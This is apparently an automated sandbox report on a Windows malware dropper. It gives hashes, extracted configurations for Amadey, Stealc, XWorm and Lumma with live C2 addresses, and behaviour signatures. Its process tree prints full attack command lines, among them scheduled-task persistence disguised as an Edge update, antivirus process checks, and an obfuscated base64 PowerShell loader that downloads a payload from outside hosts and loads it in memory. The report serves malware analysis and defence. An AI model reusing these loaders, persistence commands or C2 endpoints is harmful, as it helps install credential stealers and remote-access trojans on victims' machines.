Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-01-2025 16:12

General

  • Target

    3bd4b07526fe9acb5766a4cb72586ddb0d936ab3b9bdac0e4d259e610df42ad7.exe

  • Size

    5.6MB

  • MD5

    6b0326092618a9d22a8266da42448465

  • SHA1

    b5dfdcf95f293f6e203dd7a4b22f46b1806c3456

  • SHA256

    3bd4b07526fe9acb5766a4cb72586ddb0d936ab3b9bdac0e4d259e610df42ad7

  • SHA512

    59b1c66b79c700e46912f586e2f239a5a130291b63864aa22decd34f9d5e2ec5c72ccee22b64653df6c27b0f87e38ccc07c93b4ce17b05911fdcbe02187c09a5

  • SSDEEP

    98304:BxuIJX4CqRz7gOSUOgJ2DyrescS44vAgb9ZF6vH9NPc3SKNYJlzB6DHdH/u1KCsl:B7zqRz7gMJAyCsJrx2/YYJ14hfudsl

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

brat

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

xworm

Version

5.0

C2

91.212.166.99:4404

Mutex

f35pmRFzPiiasEf1

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    dllhost.exe

aes.plain

Extracted

Family

lumma

C2

https://toppyneedus.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 1 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Runs PowerShell to execute a payload.

  • Downloads MZ/PE file 8 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 6 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3bd4b07526fe9acb5766a4cb72586ddb0d936ab3b9bdac0e4d259e610df42ad7.exe
    "C:\Users\Admin\AppData\Local\Temp\3bd4b07526fe9acb5766a4cb72586ddb0d936ab3b9bdac0e4d259e610df42ad7.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4436
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5w56.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5w56.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3576
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\k9P43.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\k9P43.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3548
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1C08t5.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1C08t5.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4424
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2288
            • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
              "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2292
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2104
            • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
              "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1828
            • C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe
              "C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4792
            • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe
              "C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3540
              • C:\Users\Admin\AppData\Local\Temp\is-Q26E7.tmp\IJWSn6z.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-Q26E7.tmp\IJWSn6z.tmp" /SL5="$E0054,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1516
                • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe
                  "C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2620
                  • C:\Users\Admin\AppData\Local\Temp\is-759QH.tmp\IJWSn6z.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-759QH.tmp\IJWSn6z.tmp" /SL5="$A0266,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    PID:3624
                    • C:\Windows\SysWOW64\regsvr32.exe
                      "regsvr32.exe" /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"
                      10⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:3020
                      • C:\Windows\system32\regsvr32.exe
                        /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"
                        11⤵
                        • Loads dropped DLL
                        • Suspicious behavior: AddClipboardFormatListener
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:5020
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                          12⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1532
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4F9B2662-A185-4054-FBFB-A54B9E8365FC}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
                          12⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3340
                        • C:\Windows\System32\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dllhost" /tr "C:\Users\Admin\AppData\Local\dllhost.exe"
                          12⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3068
            • C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe
              "C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1068
            • C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe
              "C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:4260
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                7⤵
                • System Location Discovery: System Language Discovery
                PID:620
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  PID:3544
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4436
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  PID:2292
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2224
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 764661
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2204
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Fm
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:456
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "Tunnel" Addresses
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:5100
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:432
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3572
                • C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com
                  Macromedia.com F
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1596
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
                    9⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:4700
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    9⤵
                    PID:3548
                  • C:\Windows\SysWOW64\choice.exe
                    choice /d y /t 15
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2352
              • C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe
                "C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:4496
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c 67938ad15f2a9.vbs
                  7⤵
                  • Checks computer location settings
                  • Modifies registry class
                  PID:2712
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\67938ad15f2a9.vbs"
                    8⤵
                    • Checks computer location settings
                    PID:5116
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@
@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQ
Bz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gk@awBm@Gs@a@BT@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1012
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                        10⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2736
          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2e8001.exe
            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2e8001.exe
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3984
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3t73B.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3t73B.exe
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1524
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4E998H.exe
